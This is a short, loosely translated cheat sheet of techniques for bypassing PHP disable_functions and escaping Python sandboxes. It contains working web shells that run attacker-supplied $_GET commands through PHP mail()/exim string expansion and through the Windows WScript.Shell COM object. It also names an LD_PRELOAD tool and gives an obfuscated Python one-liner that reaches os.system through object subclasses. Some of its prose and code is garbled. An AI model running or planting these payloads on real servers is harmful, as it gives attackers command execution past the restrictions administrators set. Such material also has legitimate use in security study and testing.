Some simple bypass tricks

Bypass Disable Functions

Configuration

disable_functions = system, proc_open, popen, passthru, shell_exec, exec, python_eval, perl_system

Linux

• sendmail -> exim bypass

<?php
$command_file = "/tmp/xxxx";
$output_file = "/tmp/xxxx";
$cmd = $argv[1] ? $argv[1] : $_GET['cmd'];
$cmd = "$cmd > $output_file";
file_put_contents($command_file, $cmd);
mail("root@localhost", "xnxx", "jav", null,
     '-xnxxjav@jav(tmp1 -be ${run{/bin/sh${substr{10}{1}{$tod_log}}'.$command_file.'}} tmp2)');
echo file_get_contents($output_file);
unlink($output_file);
unlink($command_file);

• LD_PRELOAD bypass

tools : Chankro

Windows

• use COM to bypass

<?php
$runCommand = "C:\\WINDOWS\\system32\\cmd.exe /c {$_GET['cmd']}"; //Wrong by purpuse to get some good output
$WshShell = new COM("WScript.Shell");
$output = $WshShell->Exec($runCommand)->StdOut->ReadAll;
echo "<p>$output</p>";
?>

Ref

• Yet Another PHP disable_functions Bypass
• how to bypass disable functions and open basedir

Bypass Python Sandbox

Python

__builtins__Is a reference to the following modules:

python2: __builtin__
python3: builtins

Tactic

1. Use the following code to access some modules:

[].__class__.__base__.__subclasses__()

2. Use the following code to access the module imported by a module:

module.__init__.__globals__

3. Some of the modules accessed at the first point are imported osor sysmodules:

python2:
<class 'site._Printer'>
<class 'site.Quitter'>
<class warnings.catch_warnings>
<class 'warnings.WarningMessage'>
python3:
<class '_sitebuiltins.Quitter'>
<class '_sitebuiltins._Printer'>

Then use the second point to access the os module.

4. Some poses can look at abusing and n poses in ref

some interesting stdandard modules

- https://docs.python.org/2/library/types.html 
types.FileType Read files
- https://docs.python.org/2/library/timeit.html 
timeit.timeit execute code
- https://docs.python.org/2/library/inspect.html
You can guess the code structure, like: inspect.getmembers
- https://docs.python.org/2/library/pickle.html 
pickle.loads execute command
- https://docs.python.org/2/library/os.html 
os.popen Execute commands
- https://docs.python.org/2/library/commands.html commands.getstatusoutput Execute commands
- https://docs.python.org/2/library/subprocess.html 
subprocess.popen Execute the command
- https://docs.python.org/2/library/io.html 
io.open Reading files
- https://docs.python.org/2/library/platform.html 
platform.popen command execution

final

Chestnut:

python3:
[w for w in 1..__class__.__base__.__subclasses__() if w.__name__=='Quitter'][0].__init__.__globals__['sy'+'s'].modules['o'+'s'].__dict__['sy'+'stem']('ls')

Reference

• bypassing-python-sandbox-by-abusing
• python-sandbox-bypass
• python-sandbox
• n poses for Python sandbox escape
• Python can be used in the standard library of bypass Sandbox